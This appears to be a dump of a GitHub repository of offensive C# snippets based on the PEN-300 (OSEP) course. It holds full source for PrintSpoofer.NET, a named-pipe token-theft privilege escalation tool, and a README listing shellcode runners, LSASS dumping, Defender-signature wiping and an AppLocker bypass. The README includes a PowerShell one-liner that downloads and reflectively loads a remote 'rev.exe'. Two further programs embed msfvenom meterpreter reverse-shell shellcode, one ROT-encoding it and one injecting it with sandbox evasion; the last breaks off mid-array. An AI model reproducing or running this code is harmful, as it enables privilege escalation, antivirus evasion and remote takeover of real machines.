28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {4312EA9E-E161-4B69-A14B-2377CB32213A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Security.Principal;
4 | using System.Text;
5 |
6 | namespace PrintSpoofer
7 | {
8 | public class Program
9 | {
10 | public static uint PIPE_ACCESS_DUPLEX = 0x3;
11 | public static uint PIPE_TYPE_BYTE = 0x0;
12 | public static uint PIPE_WAIT = 0x0;
13 | public static uint TOKEN_ALL_ACCESS = 0xF01FF;
14 | public static uint TOKENUSER = 1;
15 | public static uint SECURITY_IMPERSONATION = 2;
16 | public static uint TOKEN_PRIMARY = 1;
17 |
18 | [StructLayout(LayoutKind.Sequential)]
19 | public struct PROCESS_INFORMATION
20 | {
21 | public IntPtr hProcess;
22 | public IntPtr hThread;
23 | public int dwProcessId;
24 | public int dwThreadId;
25 | }
26 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
27 | public struct STARTUPINFO
28 | {
29 | public Int32 cb;
30 | public string lpReserved;
31 | public string lpDesktop;
32 | public string lpTitle;
33 | public Int32 dwX;
34 | public Int32 dwY;
35 | public Int32 dwXSize;
36 | public Int32 dwYSize;
37 | public Int32 dwXCountChars;
38 | public Int32 dwYCountChars;
39 | public Int32 dwFillAttribute;
40 | public Int32 dwFlags;
41 | public Int16 wShowWindow;
42 | public Int16 cbReserved2;
43 | public IntPtr lpReserved2;
44 | public IntPtr hStdInput;
45 | public IntPtr hStdOutput;
46 | public IntPtr hStdError;
47 | }
48 |
49 | public enum CreationFlags
50 | {
51 | DefaultErrorMode = 0x04000000,
52 | NewConsole = 0x00000010,
53 | NewProcessGroup = 0x00000200,
54 | SeparateWOWVDM = 0x00000800,
55 | Suspended = 0x00000004,
56 | UnicodeEnvironment = 0x00000400,
57 | ExtendedStartupInfoPresent = 0x00080000
58 | }
59 | public enum LogonFlags
60 | {
61 | WithProfile = 1,
62 | NetCredentialsOnly
63 | }
64 |
65 | [DllImport("kernel32.dll", SetLastError = true)]
66 | static extern IntPtr CreateNamedPipe(string lpName, uint dwOpenMode, uint dwPipeMode, uint nMaxInstances, uint nOutBufferSize, uint nInBufferSize, uint nDefaultTimeOut, IntPtr lpSecurityAttributes);
67 |
68 | [DllImport("kernel32.dll")]
69 | static extern bool ConnectNamedPipe(IntPtr hNamedPipe, IntPtr lpOverlapped);
70 |
71 | [DllImport("Advapi32.dll")]
72 | static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);
73 |
74 | [DllImport("advapi32.dll", SetLastError = true)]
75 | static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);
76 |
77 | [DllImport("kernel32.dll")]
78 | static extern IntPtr GetCurrentThread();
79 |
80 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
81 | public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
82 |
83 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
84 | public extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);
85 |
86 | [DllImport("advapi32.dll", SetLastError = true)]
87 | static extern bool RevertToSelf();
88 |
89 | [DllImport("kernel32.dll")]
90 | static extern uint GetSystemDirectory([Out] StringBuilder lpBuffer, uint uSize);
91 |
92 | [DllImport("userenv.dll", SetLastError = true)]
93 | static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);
94 |
95 | public static void Main(string[] args)
96 | {
97 | // Parse arguments (pipe name)
98 | if (args.Length != 2)
99 | {
100 | Console.WriteLine("Please enter the pipe name to be used and the binary to trigger as arguments.\nExample: .\\PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\windows\\tasks\\bin.exe");
101 | return;
102 | }
103 | string pipeName = args[0];
104 | string binToRun = args[1];
105 |
106 | // Create our named pipe
107 | IntPtr hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 0x1000, 0x1000, 0, IntPtr.Zero);
108 |
109 | // Connect to our named pipe and wait for another client to connect
110 | Console.WriteLine("Waiting for client to connect to named pipe...");
111 | bool result = ConnectNamedPipe(hPipe, IntPtr.Zero);
112 |
113 | // Impersonate the token of the incoming connection
114 | result = ImpersonateNamedPipeClient(hPipe);
115 |
116 | // Open a handle on the impersonated token
117 | IntPtr tokenHandle;
118 | result = OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, false, out tokenHandle);
119 |
120 | // Duplicate the stolen token
121 | IntPtr sysToken = IntPtr.Zero;
122 | DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out sysToken);
123 |
124 | // Create an environment block for the non-interactive session
125 | IntPtr env = IntPtr.Zero;
126 | bool res = CreateEnvironmentBlock(out env, sysToken, false);
127 |
128 | // Get the impersonated identity and revert to self to ensure we have impersonation privs
129 | String name = WindowsIdentity.GetCurrent().Name;
130 | Console.WriteLine($"Impersonated user is: {name}.");
131 | RevertToSelf();
132 |
133 | // Get the system directory
134 | StringBuilder sbSystemDir = new StringBuilder(256);
135 | uint res1 = GetSystemDirectory(sbSystemDir, 256);
136 |
137 | // Spawn a new process with the duplicated token, a desktop session, and the created profile
138 | PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
139 | STARTUPINFO sInfo = new STARTUPINFO();
140 | sInfo.cb = Marshal.SizeOf(sInfo);
141 | sInfo.lpDesktop = "WinSta0\\Default";
142 | CreateProcessWithTokenW(sysToken, LogonFlags.WithProfile, null, binToRun, CreationFlags.UnicodeEnvironment, env, sbSystemDir.ToString(), ref sInfo, out pInfo);
143 | Console.WriteLine($"Executed '{binToRun}' with impersonated token!");
144 | }
145 | }
146 | }
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PrintSpoofer.NET")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PrintSpoofer.NET")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c91c8b29-82df-49c0-986b-81182cf84e42")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OSEP Code Snippets
2 | Code examples are provided as-is, without any form of warranty. Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.
3 |
4 | Classes and methods are public, so most binaries should allow for reflective loading as below.
5 |
6 | ```powershell
7 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
8 | $assem = [System.Reflection.Assembly]::Load($data)
9 | [rev.Program]::Main("".Split())
10 | ```
11 |
12 | ### Contents
13 | |Snippet Name|Description|
14 | |--|--|
15 | | AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|
16 | | Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |
17 | |Linux Shellcode Encoder (Python) | A utility script to encode C# payloads from Linux, automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|
18 | |Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.|
19 | |MiniDump (C# & PS1) |A simple binary to Dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as native PowerShell script.|
20 | |MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|
21 | |PrintSpoofer.NET (C#)|Steals the token of the incoming authentication forced with the [PrintSpooler exploit](https://github.com/leechristensen/SpoolSample), and use that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.|
22 | |ROT Shellcode Encoder (C#)|A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.|
23 | |Sections Shellcode Process Injector (C#)|Injects and runs shellcode using `NtCreateSection`, `NtMapViewOfSection`, `NtUnMapViewOfsection` and `NtClose` instead of the "standard" method.|
24 | |Shellcode Process Hollowing (C#)|Hollows a `svchost` process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.|
25 | |Shellcode Process Injector (C# & PS1) | Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).|
26 | |Simple Shellcode Runner (C# & PS1 & VBA)|The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|
27 | |XOR Shellcode Encoder (C#)|A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|
28 |
29 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace ConsoleApp2
8 | {
9 | class Program
10 | {
11 | static void Main(string[] args)
12 | {
13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f csharp
14 | byte[] buf = new byte[511] {
15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
16 | 0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,
17 | 0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,
18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
19 | 0x01,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,
20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b,
22 | 0x40,0x20,0x49,0x01,0xd0,0x50,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48,
23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
27 | 0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,
30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,
31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,
32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,
35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,
38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,
39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,
42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,
43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,
44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,
47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,
48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
49 | 0xd5 };
50 |
51 | if (args.Length == 0)
52 | {
53 | System.Console.WriteLine("Please enter a numeric argument for the number of rotations.");
54 | return;
55 | }
56 |
57 | int rotNo = int.Parse(args[0]);
58 |
59 | // Encode the payload with rotation
60 | byte[] encoded = new byte[buf.Length];
61 | for (int i = 0; i < buf.Length; i++)
62 | {
63 | encoded[i] = (byte)(((uint)buf[i] + rotNo) & 0xFF);
64 | }
65 |
66 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
67 | int totalCount = encoded.Length;
68 | for (int count = 0; count < totalCount; count++)
69 | {
70 | byte b = encoded[count];
71 |
72 | if ((count + 1) == totalCount) // Dont append comma for last item
73 | {
74 | hex.AppendFormat("0x{0:x2}", b);
75 | }
76 | else
77 | {
78 | hex.AppendFormat("0x{0:x2}, ", b);
79 | }
80 | }
81 |
82 | Console.WriteLine($"ROT{rotNo} payload:");
83 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{ {hex} }};");
84 |
85 | //// Decode the ROTxx payload (make sure to change rotations)
86 | // for (int i = 0; i < buf.Length; i++)
87 | // {
88 | // buf[i] = (byte)(((uint)buf[i] - 37) & 0xFF);
89 | //}
90 |
91 | }
92 | }
93 | }
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ROT Shellcode Encoder")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ROT Shellcode Encoder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59224c16-39c5-49ea-8525-f493dc1d66fe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {59224C16-39C5-49EA-8525-F493DC1D66FE}
8 | Exe
9 | ROT_Shellcode_Encoder
10 | ROT Shellcode Encoder
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ROT Shellcode Encoder", "ROT Shellcode Encoder.csproj", "{59224C16-39C5-49EA-8525-F493DC1D66FE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {F6755004-5FA9-4677-BBB7-D8446DC21ED4}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 |
6 | namespace RemoteShinjectLowlevel
7 | {
8 | class Program
9 | {
10 | // FOR DEBUGGING
11 | [DllImport("kernel32.dll")]
12 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
13 |
14 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
15 | static extern int memcmp(byte[] b1, byte[] b2, long count);
16 |
17 | static bool ByteArrayCompare(byte[] b1, byte[] b2)
18 | {
19 | return b1.Length == b2.Length && memcmp(b1, b2, b1.Length) == 0;
20 | }
21 | // END DEBUGGING
22 |
23 | public const uint ProcessAllFlags = 0x001F0FFF;
24 | public const uint GenericAll = 0x10000000;
25 | public const uint PageReadWrite = 0x04;
26 | public const uint PageReadExecute = 0x20;
27 | public const uint PageReadWriteExecute = 0x40;
28 | public const uint SecCommit = 0x08000000;
29 |
30 | [DllImport("kernel32.dll", SetLastError = true)]
31 | public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
32 |
33 |
34 | [DllImport("ntdll.dll", SetLastError = true)]
35 | static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize,
36 | UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle);
37 |
38 | [DllImport("ntdll.dll", SetLastError = true)]
39 | static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize,
40 | out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect);
41 |
42 | [DllImport("ntdll.dll", SetLastError = true)]
43 | static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
44 |
45 | [DllImport("ntdll.dll", ExactSpelling = true, SetLastError = false)]
46 | static extern int NtClose(IntPtr hObject);
47 |
48 | [DllImport("kernel32.dll")]
49 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
50 |
51 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
52 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
53 |
54 | [System.Runtime.InteropServices.DllImport("kernel32.dll")]
55 | static extern IntPtr GetCurrentProcess();
56 |
57 | static void Main(string[] args)
58 | {
59 | // Sandbox evasion
60 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
61 | if (mem == null)
62 | {
63 | return;
64 | }
65 |
66 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
67 | // XORed with key 0xfa
68 | byte[] buf = new byte[511] {
69 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
70 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
71 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
72 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
73 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
74 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
75 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
76 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
77 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
78 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
79 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
80 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
81 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
82 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
83 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
84 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
85 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
86 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
87 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
88 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
89 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
90 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
91 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
92 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
93 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
94 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
95 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
96 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
97 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
98 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
